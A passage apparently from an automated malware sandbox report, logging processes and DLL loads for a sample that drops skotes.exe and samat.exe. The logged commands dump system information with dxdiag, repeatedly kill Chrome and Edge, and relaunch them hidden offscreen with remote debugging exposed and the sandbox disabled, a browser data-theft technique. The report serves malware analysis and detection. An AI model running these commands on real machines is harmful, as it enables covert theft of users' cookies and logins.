Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1796 --field-trial-handle=1976,i,7400251867187163904,16596075297624197194,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
